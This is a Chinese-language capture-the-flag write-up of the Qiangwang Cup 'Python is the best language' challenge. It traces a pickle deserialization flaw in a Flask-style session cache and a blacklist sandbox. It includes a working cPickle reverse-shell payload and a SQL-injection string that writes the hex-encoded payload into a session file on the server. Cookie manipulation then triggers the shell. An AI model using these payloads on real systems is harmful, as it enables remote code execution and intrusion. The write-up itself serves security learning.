看wp复现 之 强网杯 Python is the best l

1.触发点
other.py

black_type_list = [eval, execfile, compile, system, open, file, popen, popen2, popen3, popen4, fdopen,
                   tmpfile, fchmod, fchown, pipe, chdir, fchdir, chroot, chmod, chown, link,
                   lchown, listdir, lstat, mkfifo, mknod, mkdir, makedirs, readlink, remove, removedirs,
                   rename, renames, rmdir, tempnam, tmpnam, unlink, walk, execl, execle, execlp, execv,
                   execve, execvp, execvpe, exit, fork, forkpty, kill, nice, spawnl, spawnle, spawnlp, spawnlpe,
                   spawnv, spawnve, spawnvp, spawnvpe, load, loads]

.......

def load(file):
    unpkler = Unpkler(file)
    unpkler.dispatch[REDUCE] = _hook_call(unpkler.dispatch[REDUCE])
    return Unpkler(file).load()

load()函数有一个unpkler函数用于反序列化参数(file)
如果file可控那么这就是一个反序列化漏洞。
于是追踪load()函数
load()在Mycache.py的FileSystemCache类中有多次引用

def get(self, key):
        filename = self._get_filename(key)
        try:
            with open(filename, 'rb') as f:
                pickle_time = load(f)
                if pickle_time == 0 or pickle_time >= time():
                    a = load(f)
                    return a
                else:
                    os.remove(filename)
                    return None
        except (IOError, OSError, PickleError):
            return None

继续追踪_get_filename

def _get_filename(self, key):
    if isinstance(key, text_type):
        key = key.encode('utf-8')  # XXX unicode review
    hash = md5(key).hexdigest()
    return os.path.join(self._path, hash)

可以看到将传入的字符串key进行MD5，并将其返回。
追踪一下key

class FileSystemSessionInterface(SessionInterface):
    ...
    def __init__(self, cache_dir, threshold, mode, key_prefix="bdwsessions",
                 use_signer=False, permanent=True):

        self.cache = FileSystemCache(cache_dir, threshold=threshold, mode=mode)
        self.key_prefix = key_prefix
        self.use_signer = use_signer
        self.permanent = permanent

    def open_session(self, app, request):
        # 从cookie中获取到sid
        # 格式 Cookie: session=675b6ec7-95bd-411f-a59d-4c3db5929604
        # sid 即为 675b6ec7-95bd-411f-a59d-4c3db5929604
        sid = request.cookies.get(app.session_cookie_name)
        if not sid:
            sid = self._generate_sid()
            return self.session_class(sid=sid, permanent=self.permanent)
        ...
        data = self.cache.get(self.key_prefix + sid) #重点在这
        if data is not None:
            return self.session_class(data, sid=sid)
        return self.session_class(sid=sid, permanent=self.permanent)

其中self.key_prefix即为bdwsessions，因此假设cookie中的sesssions为sworder，则self.key_prefix + sid即为bdwsessionssworder，session文件名就是MD5(bdwsessionssworder)，即file达到了可控。

大致思路如下：
1.在本地生成序列化对象(payload)，并用16进制解码
2.通过第一关的sql注入(见参考链接)，将本地生成的payload,写入服务器上的session文件，指定文件名为MD5(bdwsessionssworder),这样我们在访问/index的时候把cookie中的session值改为sworder就可以触发这个反序列化漏洞了。

沙箱逃逸.
此处漏洞无回显，所以我们就只能选择命令执行来反弹shell

black_type_list = [eval, execfile, compile, system, open, file, popen, popen2, popen3, popen4, fdopen,
                   tmpfile, fchmod, fchown, pipe, chdir, fchdir, chroot, chmod, chown, link,
                   lchown, listdir, lstat, mkfifo, mknod, mkdir, makedirs, readlink, remove, removedirs,
                   rename, renames, rmdir, tempnam, tmpnam, unlink, walk, execl, execle, execlp, execv,
                   execve, execvp, execvpe, exit, fork, forkpty, kill, nice, spawnl, spawnle, spawnlp, spawnlpe,
                   spawnv, spawnve, spawnvp, spawnvpe, load, loads]

此处过滤了大多数函数，但是commands.getoutput和subprocess.Popen()并没有过滤
这里构造序列化对象的脚本选择commands.getoutput

import cPickle
import commands

class Exp(object):
    def __reduce__(self):
        return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) 
e = Exp()
poc = cPickle.dumps(e)
print  '0x'+poc.encode('hex')

image.png

在注册处的email里填入sql语句

test'/**/union/**/select/**/0x63636f6d6d616e64730a6765746f75747075740a70310a285327707974686f6e202d63205c27696d706f727420736f636b65742c73756270726f636573732c6f733b733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c736f636b65742e534f434b5f53545245414d293b732e636f6e6e6563742828223132302e37372e3230392e313232222c3839383929293b6f732e6475703228732e66696c656e6f28292c30293b206f732e6475703228732e66696c656e6f28292c31293b206f732e6475703228732e66696c656e6f28292c32293b703d73756270726f636573732e63616c6c285b222f62696e2f7368222c222d69225d293b5c27270a70320a7470330a5270340a2e/**/into/**/dumpfile/**/'/tmp/ffff/fcae06115ab1548fa82f1d098e4de59b'#@test.com

注册后出现Please use a different email address.。说明写入成功
然后访问http://39.107.32.29:20000/index
抓包修改session值为sworder

image.png
反弹shell成功
image.png
获取flag
image.png

参考链接：
http://seaii-blog.com/index.php/2018/03/26/79.html
https://xz.aliyun.com/t/2219#toc-5

总结:
还是多看看大佬们的博客，积累积累知识吧